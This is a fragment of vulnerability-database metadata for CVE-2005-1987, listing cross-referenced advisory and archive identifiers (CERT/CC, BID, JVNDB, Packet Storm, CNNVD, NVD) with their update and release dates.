db:PACKETSTORMid:40674
db:PACKETSTORMid:40619
db:CNNVDid:CNNVD-200510-082
db:NVDid:CVE-2005-1987

LAST UPDATE DATE

2024-09-19T22:08:33.446000+00:00


SOURCES UPDATE DATE

db:CERT/CCid:VU#680526date:2007-10-11T00:00:00
db:CERT/CCid:VU#995220date:2005-10-14T00:00:00
db:CERT/CCid:VU#883460date:2005-10-14T00:00:00
db:CERT/CCid:VU#740372date:2005-10-13T00:00:00
db:CERT/CCid:VU#950516date:2005-12-15T00:00:00
db:CERT/CCid:VU#939605date:2005-07-12T00:00:00
db:BIDid:15067date:2009-07-12T17:56:00
db:JVNDBid:JVNDB-2005-000592date:2007-04-01T00:00:00
db:CNNVDid:CNNVD-200510-082date:2020-04-10T00:00:00
db:NVDid:CVE-2005-1987date:2023-11-07T01:57:32.617

SOURCES RELEASE DATE

db:CERT/CCid:VU#680526date:2005-08-19T00:00:00
db:CERT/CCid:VU#995220date:2005-10-11T00:00:00
db:CERT/CCid:VU#883460date:2005-10-11T00:00:00
db:CERT/CCid:VU#740372date:2005-08-18T00:00:00
db:CERT/CCid:VU#950516date:2005-10-11T00:00:00
db:CERT/CCid:VU#939605date:2005-07-02T00:00:00
db:BIDid:15067date:2005-10-11T00:00:00
db:JVNDBid:JVNDB-2005-000592date:2007-04-01T00:00:00
db:PACKETSTORMid:40623date:2005-10-12T01:58:20
db:PACKETSTORMid:40726date:2005-10-15T00:40:55
db:PACKETSTORMid:40674date:2005-10-12T18:16:30
db:PACKETSTORMid:40619date:2005-10-12T01:55:17
db:CNNVDid:CNNVD-200510-082date:2005-10-13T00:00:00
db:NVDid:CVE-2005-1987date:2005-10-13T10:02:00